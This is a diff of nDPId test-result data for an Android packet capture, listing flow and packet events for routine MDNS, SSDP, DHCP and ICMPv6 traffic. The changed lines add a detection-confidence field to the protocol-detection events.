+00681{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"android.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454823653,"flow_last_seen":1582454823653,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454823653,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_spotify-connect._tcp.local"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"android.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454823653,"flow_last_seen":1582454823653,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454823653,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"android.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1582454823653,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"ts_msec":1582454823653,"pkt":"AQBeAAD7xiwDYGpkCABFAABJ7RwAAAERKOPAqAIB4AAA+xTpFOkANQrOAAAAAAABAAAAAAAAEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAAADAAB"}
-00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"android.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454823653,"flow_last_seen":1582454823653,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454823653,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_spotify-connect._tcp.local"}}
+00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"android.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454823653,"flow_last_seen":1582454823653,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454823653,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_spotify-connect._tcp.local"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"android.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454825628,"flow_last_seen":1582454825628,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1582454825628,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"239.255.255.250","src_port":60538,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00603{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"android.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1582454825628,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1582454825628,"pkt":"AQBef\/\/62DBiVgAcCABFAACa4oMAAP8RXP2p\/uHY7\/\/\/+ux6B2wAhmGgTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"}
-00615{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"android.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454825628,"flow_last_seen":1582454825628,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1582454825628,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"239.255.255.250","src_port":60538,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"android.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454825628,"flow_last_seen":1582454825628,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1582454825628,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"239.255.255.250","src_port":60538,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"android.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454825629,"flow_last_seen":1582454825629,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1582454825629,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00602{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"android.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1582454825629,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1582454825629,"pkt":"AQBef\/\/6xiwDYGpkCABFAACaWhcAAAERrJjAqAIB7\/\/\/+sjTB2wAhk51TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"}
-00611{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"android.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454825629,"flow_last_seen":1582454825629,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1582454825629,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"android.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454825629,"flow_last_seen":1582454825629,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1582454825629,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"android.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1582454826369,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1582454826369,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABItCAAAEARQDTAqAIBwKgC\/+EV4RUANNgcU3BvdFVkcDDcFXQoLlJiTAABAARIlcIDokHeIIm5eNggVkvVDJHA6KPmCng="}
 01117{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"android.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1582454853081,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":552,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":552,"pkt_l4_len":518,"ts_msec":1582454853081,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAIaAQwAAEAR8XbAqAIBwKgC\/0RcRFwCBr34eyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAzMzA0MDI2MjQwMTMxNjcxMTI3MTc3MTQ1ODMyOTcxNTM2ODg0ODIsICJkaXNwbGF5bmFtZSI6ICIiLCAibmFtZXNwYWNlcyI6IFsyNzUwMzcwNTYwLCA3ODUyNjYxNzcsIDE1MjYyNjMwNDUsIDEzMzg2NTkyMDEsIDE0ODE5MzM3LCA0ODEwNTkxNzYwLCA0NTE0NzI2NTgsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA1ODM0NDk5NiwgOTk2MzA2MjE1LCA1MzAzMzAxMjQ4LCAyODUyMTYwNywgNDA1NjQ2MjU5MiwgNzA1MzYyNzE4NCwgMTUyMjE3NzU4NywgMTQyMTExNDM5OSwgMTI1MjExNjQyOSwgOTk0Njk3NzMsIDcwNzk2MzY2ODgsIDE3Njk2NDMwNywgMTI1NTQwNTY2LCAxMDQ3NDI4MTg5LCA0NzE2MTkwMDQ4LCA1NDY3MTYzMDg4LCAxMTk1MDQ0MDcxLCA5Njg1MzIyNCwgMTc2MDk5NjMsIDY0NzgzMDM0NDAsIDUxMTcwNjY0MiwgNjI5Nzk1NTE4NCwgMTQxNTYyMDM1MF19"}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"android.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1582454856384,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1582454856384,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABIA+oAAEAR8GrAqAIBwKgC\/+EV4RUANNgcU3BvdFVkcDDcFXQoLlJiTAABAARIlcIDokHeIIm5eNggVkvVDJHA6KPmCng="}
 00537{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"android.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454865794,"flow_last_seen":1582454865794,"flow_idle_time":120000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1582454865794,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff9f:f627","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"android.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1582454865794,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":78,"pkt_l4_len":24,"ts_msec":1582454865794,"pkt":"MzP\/n\/YnTGr2n\/Ynht1gAAAAABg6\/wAAAAAAAAAAAAAAAAAAAAD\/AgAAAAAAAAAAAAH\/n\/YnhwBLLgAAAAD+gAAAAAAAAE5q9v\/+n\/Yn"}
-00572{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"android.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454865794,"flow_last_seen":1582454865794,"flow_idle_time":120000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1582454865794,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff9f:f627","l4_proto":"icmp6","ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00598{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"android.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454865794,"flow_last_seen":1582454865794,"flow_idle_time":120000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1582454865794,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff9f:f627","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
 00528{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"android.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454865802,"flow_last_seen":1582454865802,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1582454865802,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"android.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1582454865802,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"ts_msec":1582454865802,"pkt":"MzMAAAAWTGr2n\/Ynht1gAAAAACQAAQAAAAAAAAAAAAAAAAAAAAD\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAHjDAAAAAQQAAAD\/AgAAAAAAAAAAAAH\/n\/Yn"}
-00563{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"android.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454865802,"flow_last_seen":1582454865802,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1582454865802,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00589{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"android.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454865802,"flow_last_seen":1582454865802,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1582454865802,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"android.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1582454866026,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"ts_msec":1582454866026,"pkt":"MzMAAAAWTGr2n\/Ynht1gAAAAACQAAQAAAAAAAAAAAAAAAAAAAAD\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAHjDAAAAAQQAAAD\/AgAAAAAAAAAAAAH\/n\/Yn"}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"android.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866407,"flow_last_seen":1582454866407,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1582454866407,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.16","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00835{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"android.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1582454866407,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1582454866407,"pkt":"TGr2n\/YnxiwDYGpkCABFAAFILXYAAP8RB83AqAIBwKgCEABDAEQBNN9OAgEGAO9+0loAAAAAAAAAAMCoAhDAqAIBAAAAAExq9p\/2JwAAAAAAAAAAAABMdWNhcy1pTWFjLmxvY2FsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQECNgTAqAIBMwQAAU4gAQT\/\/\/8AAwTAqAIBBgTAqAIB\/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"android.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866407,"flow_last_seen":1582454866407,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1582454866407,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.16","src_port":67,"dst_port":68,"l4_proto":"udp","ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}}
+00688{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"android.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866407,"flow_last_seen":1582454866407,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1582454866407,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.16","src_port":67,"dst_port":68,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"android.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866448,"flow_last_seen":1582454866448,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1582454866448,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"android.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1582454866448,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":114,"pkt_l4_len":60,"ts_msec":1582454866448,"pkt":"MzMAAQACTGr2n\/Ynht1gBNipADwRAf6AAAAAAAAATmr2\/\/6f9if\/AgAAAAAAAAAAAAAAAQACAiICIwA8Uc8B2OT+AAEADgABAAEl5RSOTGr2n\/YnAAMADA4ACMoAAAAAAAAAAAAIAAIAAAAGAAQAFwAY"}
-00615{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"android.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866448,"flow_last_seen":1582454866448,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1582454866448,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"proto":"DHCPV6","breed":"Acceptable","category":"Network"}}
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"android.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866448,"flow_last_seen":1582454866448,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1582454866448,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}}
 00835{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"android.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1582454866538,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1582454866538,"pkt":"TGr2n\/YnxiwDYGpkCABFAAFILXcAAP8RB8zAqAIBwKgCEABDAEQBNNxOAgEGAO9+0loAAAAAAAAAAMCoAhDAqAIBAAAAAExq9p\/2JwAAAAAAAAAAAABMdWNhcy1pTWFjLmxvY2FsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEFNgTAqAIBMwQAAU4gAQT\/\/\/8AAwTAqAIBBgTAqAIB\/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
 00551{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"android.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866803,"flow_last_seen":1582454866803,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1582454866803,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3}
 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"android.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1582454866803,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"ts_msec":1582454866803,"pkt":"MzMAAAAWTGr2n\/Ynht1gAAAAACQAAf6AAAAAAAAATmr2\/\/6f9if\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAEAQAAAAAQQAAAD\/AgAAAAAAAAAAAAH\/n\/Yn"}
-00586{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"android.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866803,"flow_last_seen":1582454866803,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1582454866803,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00612{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"android.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866803,"flow_last_seen":1582454866803,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1582454866803,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
 00550{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"android.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866803,"flow_last_seen":1582454866803,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1582454866803,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"android.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1582454866803,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"ts_msec":1582454866803,"pkt":"MzMAAAACTGr2n\/Ynht1gAAAAABA6\/\/6AAAAAAAAATmr2\/\/6f9if\/AgAAAAAAAAAAAAAAAAAChQAIygAAAAABAUxq9p\/2Jw=="}
-00585{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"android.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866803,"flow_last_seen":1582454866803,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1582454866803,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::2","l4_proto":"icmp6","ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
